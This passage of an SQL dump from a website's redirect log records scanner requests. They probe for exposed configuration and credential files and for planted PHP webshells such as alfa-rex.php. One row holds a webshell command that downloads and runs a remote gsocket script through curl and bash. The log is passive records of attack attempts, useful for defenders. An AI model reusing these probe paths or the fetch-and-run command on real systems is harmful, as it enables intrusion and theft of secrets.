19:04:36','0000-00-00 00:00:00',301),(43515,'https://3s-technologies.com.tr/tr/config/production/settings.json',NULL,'','',2,0,'2025-07-26 19:04:37','0000-00-00 00:00:00',301),(43516,'https://3s-technologies.com.tr/tr/robomed.web/appsettings.json',NULL,'','',2,0,'2025-07-26 19:04:38','0000-00-00 00:00:00',301),(43517,'https://3s-technologies.com.tr/tr/c10/config.json',NULL,'','',2,0,'2025-07-26 19:04:38','0000-00-00 00:00:00',301),(43518,'https://3s-technologies.com.tr/tr/resources/mailgun/config.json',NULL,'','',2,0,'2025-07-26 19:04:39','0000-00-00 00:00:00',301),(43519,'https://3s-technologies.com.tr/tr/formerameasure/appsettings.json',NULL,'','',2,0,'2025-07-26 19:04:40','0000-00-00 00:00:00',301),(43520,'https://3s-technologies.com.tr/tr/server/datasources.localhost.json',NULL,'','',2,0,'2025-07-26 19:04:41','0000-00-00 00:00:00',301),(43521,'https://3s-technologies.com.tr/tr/config/staging.json',NULL,'','',2,0,'2025-07-26 19:04:42','0000-00-00 00:00:00',301),(43522,'https://3s-technologies.com.tr/tr/config/production.json',NULL,'','',2,0,'2025-07-26 19:04:43','0000-00-00 00:00:00',301),(43523,'https://3s-technologies.com.tr/tr/c11/config.json',NULL,'','',2,0,'2025-07-26 19:04:43','0000-00-00 00:00:00',301),(43524,'https://3s-technologies.com.tr/tr/config/config.json',NULL,'','',2,0,'2025-07-26 19:04:44','0000-00-00 00:00:00',301),(43525,'https://3s-technologies.com.tr/tr/config/test.json',NULL,'','',2,0,'2025-07-26 19:04:45','0000-00-00 00:00:00',301),(43526,'http://3s-technologies.com.tr/tr/p/i',NULL,'','',1,0,'2025-07-26 22:24:27','0000-00-00 00:00:00',301),(43527,'http://3s-technologies.com.tr/tr/wp-admin/user/plugins.php/wp-includes/certificates/plugins.php',NULL,'','',1,0,'2025-07-26 22:24:33','0000-00-00 00:00:00',301),(43528,'http://3s-technologies.com.tr/tr/img/about',NULL,'','',2,0,'2025-07-27 05:07:41','0000-00-00 00:00:00',301),(43529,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/mar.phphttps:/soundfusestudio.com/wp-links.php',NULL,'','',1,0,'2025-07-27 05:07:53','0000-00-00 00:00:00',301),(43530,'http://3s-technologies.com.tr/tr/wp-includes/id3/index.phphttps:/cn-ves.com/m.php',NULL,'','',1,0,'2025-07-27 08:49:52','0000-00-00 00:00:00',301),(43531,'http://3s-technologies.com.tr/tr/wp-links-opml.php/wp-includes/certificates/plugins.php',NULL,'','',1,0,'2025-07-27 08:49:58','0000-00-00 00:00:00',301),(43532,'http://3s-technologies.com.tr/tr/zko/readme.php',NULL,'','',2,0,'2025-07-27 08:50:00','0000-00-00 00:00:00',301),(43533,'http://3s-technologies.com.tr/tr/file7.php',NULL,'','',106,0,'2025-07-27 08:50:03','0000-00-00 00:00:00',301),(43534,'http://3s-technologies.com.tr/tr/wp/wp-admin/includes',NULL,'','',15,0,'2025-07-27 12:36:21','0000-00-00 00:00:00',301),(43535,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern',NULL,'','',22,0,'2025-07-27 12:36:22','0000-00-00 00:00:00',301),(43536,'http://3s-technologies.com.tr/tr/modules/file.php',NULL,'','',7,0,'2025-07-27 12:36:41','0000-00-00 00:00:00',301),(43537,'http://3s-technologies.com.tr/tr/wp-content/uploads/2022',NULL,'','',9,0,'2025-07-27 12:36:44','0000-00-00 00:00:00',301),(43538,'http://3s-technologies.com.tr/tr/wp-includes/file.php',NULL,'','',8,0,'2025-07-27 12:36:57','0000-00-00 00:00:00',301),(43539,'http://3s-technologies.com.tr/tr/aspera/faspex',NULL,'','',7,0,'2025-07-27 12:37:01','0000-00-00 00:00:00',301),(43540,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021',NULL,'','',7,0,'2025-07-27 12:37:07','0000-00-00 00:00:00',301),(43541,'http://3s-technologies.com.tr/tr/admin/upload',NULL,'','',8,0,'2025-07-27 12:37:13','0000-00-00 00:00:00',301),(43542,'http://3s-technologies.com.tr/tr/shell20211028.phphttps:/aasthainwanderland.in/wp-admin/images/index.php',NULL,'','',1,0,'2025-07-27 13:50:42','0000-00-00 00:00:00',301),(43543,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/classwithtostring.php/wp-admin/user/admin.php/wp-content/uploads/json.php',NULL,'','',1,0,'2025-07-27 13:50:47','0000-00-00 00:00:00',301),(43544,'http://3s-technologies.com.tr/tr/wp-content/index.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-27 13:50:54','0000-00-00 00:00:00',301),(43545,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php/wp-content/uploads/json.php',NULL,'','',1,0,'2025-07-27 13:51:00','0000-00-00 00:00:00',301),(43546,'http://3s-technologies.com.tr/tr/wp-includes/id3/index.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-27 13:51:03','0000-00-00 00:00:00',301),(43547,'http://3s-technologies.com.tr/en/local/moodle_webshell/webshell.php?action=exec&cmd=id',NULL,'http://example.com','',1,0,'2025-07-27 16:53:00','0000-00-00 00:00:00',301),(43548,'http://3s-technologies.com.tr/en/local/moodle_webshell/webshell.php?action=exec&cmd=bash -c \"$(curl -fssl https://gsocket.io/y)\"',NULL,'http://example.com','',1,0,'2025-07-27 16:53:26','0000-00-00 00:00:00',301),(43549,'https://3s-technologies.com.tr/tr/lib/validateemail.js',NULL,'','',1,0,'2025-07-27 16:57:17','0000-00-00 00:00:00',301),(43550,'https://3s-technologies.com.tr/tr/src/rules/mailgun.js',NULL,'','',1,0,'2025-07-27 16:57:22','0000-00-00 00:00:00',301),(43551,'https://3s-technologies.com.tr/tr/examples/contact/app.js',NULL,'','',1,0,'2025-07-27 16:57:23','0000-00-00 00:00:00',301),(43552,'https://3s-technologies.com.tr/tr/src/sendmail.js',NULL,'','',1,0,'2025-07-27 16:57:24','0000-00-00 00:00:00',301),(43553,'https://3s-technologies.com.tr/tr/src/core/email.js',NULL,'','',1,0,'2025-07-27 16:57:25','0000-00-00 00:00:00',301),(43554,'https://3s-technologies.com.tr/tr/update/add-route.js',NULL,'','',1,0,'2025-07-27 16:57:26','0000-00-00 00:00:00',301),(43555,'https://3s-technologies.com.tr/tr/src/index.js',NULL,'','',1,0,'2025-07-27 16:57:27','0000-00-00 00:00:00',301),(43556,'https://3s-technologies.com.tr/tr/backend/libs/mail.js',NULL,'','',1,0,'2025-07-27 16:57:28','0000-00-00 00:00:00',301),(43557,'https://3s-technologies.com.tr/tr/src/providers/email/mailgun.js',NULL,'','',1,0,'2025-07-27 16:57:29','0000-00-00 00:00:00',301),(43558,'https://3s-technologies.com.tr/tr/system/services/mailer.js',NULL,'','',1,0,'2025-07-27 16:57:30','0000-00-00 00:00:00',301),(43559,'https://3s-technologies.com.tr/tr/routes/api/user.js',NULL,'','',1,0,'2025-07-27 16:57:30','0000-00-00 00:00:00',301),(43560,'https://3s-technologies.com.tr/tr/config/config.js.template',NULL,'','',1,0,'2025-07-27 16:57:31','0000-00-00 00:00:00',301),(43561,'https://3s-technologies.com.tr/tr/lib/configs/email.service.testurl.config.js',NULL,'','',1,0,'2025-07-27 16:57:32','0000-00-00 00:00:00',301),(43562,'https://3s-technologies.com.tr/tr/config/env/production/plugins.js',NULL,'','',1,0,'2025-07-27 16:57:33','0000-00-00 00:00:00',301),(43563,'https://3s-technologies.com.tr/tr/config/config.js.example',NULL,'','',1,0,'2025-07-27 16:57:34','0000-00-00 00:00:00',301),(43564,'https://3s-technologies.com.tr/tr/gulpfile.js',NULL,'','',1,0,'2025-07-27 16:57:34','0000-00-00 00:00:00',301),(43565,'https://3s-technologies.com.tr/tr/cloud/keys.js',NULL,'','',1,0,'2025-07-27 16:57:35','0000-00-00 00:00:00',301),(43566,'https://3s-technologies.com.tr/tr/src/validateemailaddress.js',NULL,'','',1,0,'2025-07-27 16:57:36','0000-00-00 00:00:00',301),(43567,'https://3s-technologies.com.tr/tr/email-config.js',NULL,'','',1,0,'2025-07-27 16:57:37','0000-00-00 00:00:00',301),(43568,'https://3s-technologies.com.tr/tr/proxy.js',NULL,'','',1,0,'2025-07-27 16:57:38','0000-00-00 00:00:00',301),(43569,'https://3s-technologies.com.tr/tr/config/env/development.js',NULL,'','',1,0,'2025-07-27 16:57:38','0000-00-00 00:00:00',301),(43570,'https://3s-technologies.com.tr/tr/src/env.js',NULL,'','',1,0,'2025-07-27 16:57:39','0000-00-00 00:00:00',301),(43571,'https://3s-technologies.com.tr/tr/src/notify.js',NULL,'','',1,0,'2025-07-27 16:57:40','0000-00-00 00:00:00',301),(43572,'https://3s-technologies.com.tr/tr/src/mailgun-mcp.js',NULL,'','',1,0,'2025-07-27 16:57:41','0000-00-00 00:00:00',301),(43573,'https://3s-technologies.com.tr/tr/config.js',NULL,'','',18,0,'2025-07-27 16:57:42','0000-00-00 00:00:00',301),(43574,'https://3s-technologies.com.tr/tr/config.template.js',NULL,'','',1,0,'2025-07-27 16:57:43','0000-00-00 00:00:00',301),(43575,'https://3s-technologies.com.tr/tr/models/emailer.js',NULL,'','',1,0,'2025-07-27 16:57:44','0000-00-00 00:00:00',301),(43576,'https://3s-technologies.com.tr/tr/app/routes/users.js',NULL,'','',1,0,'2025-07-27 16:57:45','0000-00-00 00:00:00',301),(43577,'https://3s-technologies.com.tr/tr/static/js/main.js',NULL,'','',1,0,'2025-07-27 16:57:45','0000-00-00 00:00:00',301),(43578,'https://3s-technologies.com.tr/tr/js/main.js',NULL,'','',1,0,'2025-07-27 16:57:46','0000-00-00 00:00:00',301),(43579,'https://3s-technologies.com.tr/tr/helpers/constants.js',NULL,'','',1,0,'2025-07-27 16:57:47','0000-00-00 00:00:00',301),(43580,'https://3s-technologies.com.tr/tr/app/lib/send-email.js',NULL,'','',1,0,'2025-07-27 16:57:48','0000-00-00 00:00:00',301),(43581,'https://3s-technologies.com.tr/tr/src/config.js',NULL,'','',1,0,'2025-07-27 16:57:49','0000-00-00 00:00:00',301),(43582,'https://3s-technologies.com.tr/tr/modules/configs.js',NULL,'','',1,0,'2025-07-27 16:57:50','0000-00-00 00:00:00',301),(43583,'https://3s-technologies.com.tr/tr/config/parse-server.config.js',NULL,'','',1,0,'2025-07-27 16:57:51','0000-00-00 00:00:00',301),(43584,'https://3s-technologies.com.tr/tr/src/config/app-config.js',NULL,'','',1,0,'2025-07-27 16:57:51','0000-00-00 00:00:00',301),(43585,'https://3s-technologies.com.tr/tr/ecosystem.config.js',NULL,'','',2,0,'2025-07-27 16:57:52','0000-00-00 00:00:00',301),(43586,'https://3s-technologies.com.tr/tr/webpack.config.js',NULL,'','',1,0,'2025-07-27 16:57:53','0000-00-00 00:00:00',301),(43587,'https://3s-technologies.com.tr/tr/config/config.dev.js',NULL,'','',1,0,'2025-07-27 16:57:54','0000-00-00 00:00:00',301),(43588,'https://3s-technologies.com.tr/tr/siteconfig.js',NULL,'','',1,0,'2025-07-27 16:57:55','0000-00-00 00:00:00',301),(43589,'https://3s-technologies.com.tr/tr/connections/configmailgun.js',NULL,'','',1,0,'2025-07-27 16:57:56','0000-00-00 00:00:00',301),(43590,'https://3s-technologies.com.tr/tr/.devcontainer/createlocalconfig.js',NULL,'','',1,0,'2025-07-27 16:57:57','0000-00-00 00:00:00',301),(43591,'https://3s-technologies.com.tr/tr/config/mail.config.js',NULL,'','',1,0,'2025-07-27 16:57:58','0000-00-00 00:00:00',301),(43592,'https://3s-technologies.com.tr/tr/configs.js',NULL,'','',1,0,'2025-07-27 16:57:59','0000-00-00 00:00:00',301),(43593,'https://3s-technologies.com.tr/tr/config/smtpconfig.js',NULL,'','',1,0,'2025-07-27 16:57:59','0000-00-00 00:00:00',301),(43594,'https://3s-technologies.com.tr/tr/config/config.js',NULL,'','',1,0,'2025-07-27 16:58:00','0000-00-00 00:00:00',301),(43595,'https://3s-technologies.com.tr/tr/lib/config.js',NULL,'','',1,0,'2025-07-27 16:58:01','0000-00-00 00:00:00',301),(43596,'https://3s-technologies.com.tr/tr/backend/config.js',NULL,'','',1,0,'2025-07-27 16:58:02','0000-00-00 00:00:00',301),(43597,'https://3s-technologies.com.tr/tr/ex2/config.js',NULL,'','',1,0,'2025-07-27 16:58:03','0000-00-00 00:00:00',301),(43598,'https://3s-technologies.com.tr/tr/libs/config.js',NULL,'','',1,0,'2025-07-27 16:58:04','0000-00-00 00:00:00',301),(43599,'https://3s-technologies.com.tr/tr/server/config.js',NULL,'','',1,0,'2025-07-27 16:58:04','0000-00-00 00:00:00',301),(43600,'https://3s-technologies.com.tr/tr/chunks/app-environment.js',NULL,'','',1,0,'2025-07-27 16:58:05','0000-00-00 00:00:00',301),(43601,'https://3s-technologies.com.tr/tr/src/config/dotenv.js',NULL,'','',1,0,'2025-07-27 16:58:06','0000-00-00 00:00:00',301),(43602,'https://3s-technologies.com.tr/tr/.jest/setup-env.js',NULL,'','',1,0,'2025-07-27 16:58:07','0000-00-00 00:00:00',301),(43603,'https://3s-technologies.com.tr/tr/config/env.config.js',NULL,'','',1,0,'2025-07-27 16:58:08','0000-00-00 00:00:00',301),(43604,'https://3s-technologies.com.tr/tr/utils/enviarmail.js',NULL,'','',1,0,'2025-07-27 16:58:09','0000-00-00 00:00:00',301),(43605,'https://3s-technologies.com.tr/tr/config/env.constant.js',NULL,'','',1,0,'2025-07-27 16:58:09','0000-00-00 00:00:00',301),(43606,'https://3s-technologies.com.tr/tr/bin/common/env-values.js',NULL,'','',1,0,'2025-07-27 16:58:10','0000-00-00 00:00:00',301),(43607,'https://3s-technologies.com.tr/tr/lib/mailenv.js',NULL,'','',1,0,'2025-07-27 16:58:11','0000-00-00 00:00:00',301),(43608,'https://3s-technologies.com.tr/tr/src/dotenvconfig.js',NULL,'','',1,0,'2025-07-27 16:58:12','0000-00-00 00:00:00',301),(43609,'https://3s-technologies.com.tr/tr/dotenvconfig.js',NULL,'','',1,0,'2025-07-27 16:58:13','0000-00-00 00:00:00',301),(43610,'https://3s-technologies.com.tr/tr/config/dev_environment.js',NULL,'','',1,0,'2025-07-27 16:58:14','0000-00-00 00:00:00',301),(43611,'https://3s-technologies.com.tr/tr/config/local.env.sample.js',NULL,'','',1,0,'2025-07-27 16:58:15','0000-00-00 00:00:00',301),(43612,'https://3s-technologies.com.tr/tr/src/js/env.js',NULL,'','',1,0,'2025-07-27 16:58:16','0000-00-00 00:00:00',301),(43613,'https://3s-technologies.com.tr/tr/js/env.js',NULL,'','',1,0,'2025-07-27 16:58:17','0000-00-00 00:00:00',301),(43614,'https://3s-technologies.com.tr/tr/config/env.js',NULL,'','',1,0,'2025-07-27 16:58:18','0000-00-00 00:00:00',301),(43615,'https://3s-technologies.com.tr/tr/server/api/env.js',NULL,'','',1,0,'2025-07-27 16:58:19','0000-00-00 00:00:00',301),(43616,'https://3s-technologies.com.tr/tr/api/env.js',NULL,'','',1,0,'2025-07-27 16:58:20','0000-00-00 00:00:00',301),(43617,'https://3s-technologies.com.tr/tr/utils/env.js',NULL,'','',1,0,'2025-07-27 16:58:20','0000-00-00 00:00:00',301),(43618,'https://3s-technologies.com.tr/tr/environment.js',NULL,'','',1,0,'2025-07-27 16:58:21','0000-00-00 00:00:00',301),(43619,'https://3s-technologies.com.tr/tr/config/environment.js',NULL,'','',1,0,'2025-07-27 16:58:22','0000-00-00 00:00:00',301),(43620,'https://3s-technologies.com.tr/tr/src/config/env.js',NULL,'','',1,0,'2025-07-27 16:58:23','0000-00-00 00:00:00',301),(43621,'https://3s-technologies.com.tr/tr/server/environment.js',NULL,'','',1,0,'2025-07-27 16:58:24','0000-00-00 00:00:00',301),(43622,'https://3s-technologies.com.tr/tr/config/envvars.js',NULL,'','',1,0,'2025-07-27 16:58:25','0000-00-00 00:00:00',301),(43623,'https://3s-technologies.com.tr/tr/src/common/config/env.js',NULL,'','',1,0,'2025-07-27 16:58:26','0000-00-00 00:00:00',301),(43624,'https://3s-technologies.com.tr/tr/config/env_config.js',NULL,'','',1,0,'2025-07-27 16:58:26','0000-00-00 00:00:00',301),(43625,'https://3s-technologies.com.tr/tr/config/dev.env.js',NULL,'','',1,0,'2025-07-27 16:58:27','0000-00-00 00:00:00',301),(43626,'https://3s-technologies.com.tr/tr/config/env.dist.js',NULL,'','',1,0,'2025-07-27 16:58:28','0000-00-00 00:00:00',301),(43627,'https://3s-technologies.com.tr/tr/__tests__/env.test.js',NULL,'','',1,0,'2025-07-27 16:58:29','0000-00-00 00:00:00',301),(43628,'https://3s-technologies.com.tr/tr/config/prod.env.js',NULL,'','',1,0,'2025-07-27 16:58:30','0000-00-00 00:00:00',301),(43629,'https://3s-technologies.com.tr/tr/src/test/env.test.js',NULL,'','',1,0,'2025-07-27 16:58:31','0000-00-00 00:00:00',301),(43630,'https://3s-technologies.com.tr/tr/config.js.sample',NULL,'','',1,0,'2025-07-27 16:58:31','0000-00-00 00:00:00',301),(43631,'https://3s-technologies.com.tr/tr/config/local.js.sample',NULL,'','',1,0,'2025-07-27 16:58:32','0000-00-00 00:00:00',301),(43632,'https://3s-technologies.com.tr/tr/config/mailgun.js.sample',NULL,'','',1,0,'2025-07-27 16:58:33','0000-00-00 00:00:00',301),(43633,'https://3s-technologies.com.tr/tr/default/config.js.erb',NULL,'','',1,0,'2025-07-27 16:58:34','0000-00-00 00:00:00',301),(43634,'https://3s-technologies.com.tr/tr/lib/config.js.example',NULL,'','',1,0,'2025-07-27 16:58:35','0000-00-00 00:00:00',301),(43635,'https://3s-technologies.com.tr/tr/server/smtp.js.example',NULL,'','',1,0,'2025-07-27 16:58:36','0000-00-00 00:00:00',301),(43636,'https://3s-technologies.com.tr/tr/templates/config.js.j2',NULL,'','',1,0,'2025-07-27 16:58:37','0000-00-00 00:00:00',301),(43637,'https://3s-technologies.com.tr/tr/config.js.old',NULL,'','',1,0,'2025-07-27 16:58:38','0000-00-00 00:00:00',301),(43638,'https://3s-technologies.com.tr/tr/config.js.bkp',NULL,'','',1,0,'2025-07-27 16:58:39','0000-00-00 00:00:00',301),(43639,'https://3s-technologies.com.tr/tr/config.js.template',NULL,'','',1,0,'2025-07-27 16:58:39','0000-00-00 00:00:00',301),(43640,'https://3s-technologies.com.tr/tr/lib/config.js.template',NULL,'','',1,0,'2025-07-27 16:58:40','0000-00-00 00:00:00',301),(43641,'https://3s-technologies.com.tr/tr/config.js.conf',NULL,'','',1,0,'2025-07-27 16:58:41','0000-00-00 00:00:00',301),(43642,'https://3s-technologies.com.tr/tr/main.js.old',NULL,'','',1,0,'2025-07-27 16:58:42','0000-00-00 00:00:00',301),(43643,'https://3s-technologies.com.tr/tr/config.js.erb',NULL,'','',1,0,'2025-07-27 16:58:43','0000-00-00 00:00:00',301),(43644,'https://3s-technologies.com.tr/tr/config.js.example',NULL,'','',1,0,'2025-07-27 16:58:44','0000-00-00 00:00:00',301),(43645,'https://3s-technologies.com.tr/tr/js/script.js.bak',NULL,'','',1,0,'2025-07-27 16:58:44','0000-00-00 00:00:00',301),(43646,'https://3s-technologies.com.tr/tr/conf/config.js.erb',NULL,'','',1,0,'2025-07-27 16:58:45','0000-00-00 00:00:00',301),(43647,'https://3s-technologies.com.tr/tr/config/ghost/config.js.orig',NULL,'','',1,0,'2025-07-27 16:58:46','0000-00-00 00:00:00',301),(43648,'https://3s-technologies.com.tr/tr/local.js.sample',NULL,'','',1,0,'2025-07-27 16:58:47','0000-00-00 00:00:00',301),(43649,'https://3s-technologies.com.tr/tr/config/env.js.example',NULL,'','',1,0,'2025-07-27 16:58:48','0000-00-00 00:00:00',301),(43650,'https://3s-technologies.com.tr/tr/env.js.example',NULL,'','',1,0,'2025-07-27 16:58:48','0000-00-00 00:00:00',301),(43651,'https://3s-technologies.com.tr/tr/secrets.js.example',NULL,'','',1,0,'2025-07-27 16:58:49','0000-00-00 00:00:00',301),(43652,'https://3s-technologies.com.tr/tr/config/config.js.dist',NULL,'','',1,0,'2025-07-27 16:58:50','0000-00-00 00:00:00',301),(43653,'https://3s-technologies.com.tr/tr/appsettings.json',NULL,'','',5,0,'2025-07-27 16:58:51','0000-00-00 00:00:00',301),(43654,'https://3s-technologies.com.tr/tr/api/controllers/contactcontroller.js',NULL,'','',1,0,'2025-07-27 16:58:52','0000-00-00 00:00:00',301),(43655,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/img/index.php',NULL,'www.google.com','',3,0,'2025-07-28 04:23:34','0000-00-00 00:00:00',301),(43656,'http://www.3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing\n',NULL,'','',3,0,'2025-07-28 10:18:12','0000-00-00 00:00:00',301),(43657,'http://3s-technologies.com.tr/tr/wp-includes/fonts/wp/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:09:00','0000-00-00 00:00:00',301),(43658,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/commands/alfa-rex.php',NULL,'','',2,0,'2025-07-28 12:09:01','0000-00-00 00:00:00',301),(43659,'http://3s-technologies.com.tr/tr/veoblmpa.php',NULL,'','',3,0,'2025-07-28 12:09:02','0000-00-00 00:00:00',301),(43660,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/js/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:03','0000-00-00 00:00:00',301),(43661,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/languages/about.php',NULL,'','',1,0,'2025-07-28 12:09:04','0000-00-00 00:00:00',301),(43662,'http://3s-technologies.com.tr/tr/upload/uday.php',NULL,'','',2,0,'2025-07-28 12:09:05','0000-00-00 00:00:00',301),(43663,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/templates/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:05','0000-00-00 00:00:00',301),(43664,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/net/about.php',NULL,'','',2,0,'2025-07-28 12:09:06','0000-00-00 00:00:00',301),(43665,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/inc/alfa-rex.php',NULL,'','',2,0,'2025-07-28 12:09:07','0000-00-00 00:00:00',301),(43666,'http://3s-technologies.com.tr/tr/wp-includes/ixr/alfa-rex.php7',NULL,'','',2,0,'2025-07-28 12:09:09','0000-00-00 00:00:00',301),(43667,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/about.php',NULL,'','',2,0,'2025-07-28 12:09:11','0000-00-00 00:00:00',301),(43668,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:09:12','0000-00-00 00:00:00',301),(43669,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:09:14','0000-00-00 00:00:00',301),(43670,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:14','0000-00-00 00:00:00',301),(43671,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-library/about.php',NULL,'','',2,0,'2025-07-28 12:09:15','0000-00-00 00:00:00',301),(43672,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/alfa-rex.php',NULL,'','',3,0,'2025-07-28 12:09:16','0000-00-00 00:00:00',301),(43673,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/vendor/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:17','0000-00-00 00:00:00',301),(43674,'http://3s-technologies.com.tr/tr/wp-content/themes/tripod/woocustomtemplates/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:18','0000-00-00 00:00:00',301),(43675,'http://3s-technologies.com.tr/tr/wp-content/themes/rxoxv7ut/inc/gutenberg/about.php',NULL,'','',1,0,'2025-07-28 12:09:20','0000-00-00 00:00:00',301),(43676,'http://3s-technologies.com.tr/tr/wp-content/plugins/akismet/alfa-rex.php7',NULL,'','',4,0,'2025-07-28 12:09:21','0000-00-00 00:00:00',301),(43677,'http://3s-technologies.com.tr/tr/wp-content/plugins/recent-facebook-posts/languages/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:22','0000-00-00 00:00:00',301),(43678,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/alfa-rex.php',NULL,'','',2,0,'2025-07-28 12:09:23','0000-00-00 00:00:00',301),(43679,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/fontawesome/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:24','0000-00-00 00:00:00',301),(43680,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/parts/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:25','0000-00-00 00:00:00',301),(43681,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/assets/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:09:26','0000-00-00 00:00:00',301),(43682,'http://3s-technologies.com.tr/tr/wp-includes/js/alfa-rex.php8',NULL,'','',4,0,'2025-07-28 12:09:27','0000-00-00 00:00:00',301),(43683,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/alfa-rex.php8',NULL,'','',4,0,'2025-07-28 12:09:27','0000-00-00 00:00:00',301),(43684,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/wp-atom.php',NULL,'','',1,0,'2025-07-28 12:09:28','0000-00-00 00:00:00',301),(43685,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-widgets/about.php',NULL,'','',2,0,'2025-07-28 12:09:29','0000-00-00 00:00:00',301),(43686,'http://3s-technologies.com.tr/tr/wp-content/themes/customizr/about.php',NULL,'','',1,0,'2025-07-28 12:09:30','0000-00-00 00:00:00',301),(43687,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/images/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:31','0000-00-00 00:00:00',301),(43688,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:09:32','0000-00-00 00:00:00',301),(43689,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/templates/about.php',NULL,'','',1,0,'2025-07-28 12:09:33','0000-00-00 00:00:00',301),(43690,'http://3s-technologies.com.tr/tr/wp-admin/css/alfa-rex.php',NULL,'','',2,0,'2025-07-28 12:09:34','0000-00-00 00:00:00',301),(43691,'http://3s-technologies.com.tr/tr/wp-content/plugins/akismet/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:09:35','0000-00-00 00:00:00',301),(43692,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/about.php',NULL,'','',2,0,'2025-07-28 12:09:35','0000-00-00 00:00:00',301),(43693,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/styles/alfa-rex.php8',NULL,'','',2,0,'2025-07-28 12:09:36','0000-00-00 00:00:00',301),(43694,'http://3s-technologies.com.tr/tr/wp-content/themes/customizr/assets/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:37','0000-00-00 00:00:00',301),(43695,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/parts/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:38','0000-00-00 00:00:00',301),(43696,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:09:39','0000-00-00 00:00:00',301),(43697,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/inc/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:40','0000-00-00 00:00:00',301),(43698,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml/about.php',NULL,'','',3,0,'2025-07-28 12:09:41','0000-00-00 00:00:00',301),(43699,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwelve/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:42','0000-00-00 00:00:00',301),(43700,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/languages/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:43','0000-00-00 00:00:00',301),(43701,'http://3s-technologies.com.tr/tr/wp-content/themes/customizr/alfa-rex.php',NULL,'','',1,0,'2025-07-28 12:09:44','0000-00-00 00:00:00',301),(43702,'http://3s-technologies.com.tr/tr/wp-content/themes/customizr/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:46','0000-00-00 00:00:00',301),(43703,'http://3s-technologies.com.tr/tr/wp-includes/ixr/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:47','0000-00-00 00:00:00',301),(43704,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/commands/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:47','0000-00-00 00:00:00',301),(43705,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/snippets/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:48','0000-00-00 00:00:00',301),(43706,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/about.php',NULL,'','',1,0,'2025-07-28 12:09:49','0000-00-00 00:00:00',301),(43707,'http://3s-technologies.com.tr/tr/wp-includes/requests/alfa-rex.php7',NULL,'','',1,0,'2025-07-28 12:09:50','0000-00-00 00:00:00',301),(43708,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/about.php',NULL,'','',1,0,'2025-07-28 12:09:52','0000-00-00 00:00:00',301),(43709,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/net/wp-login.php',NULL,'','',1,0,'2025-07-28 12:09:53','0000-00-00 00:00:00',301),(43710,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/languages/alfa-rex.php8',NULL,'','',1,0,'2025-07-28 12:09:54','0000-00-00 00:00:00',301),(43711,'http://3s-technologies.com.tr/tr/wp-includes/requests/about.php7',NULL,'','',1,0,'2025-07-28 12:09:55','0000-00-00 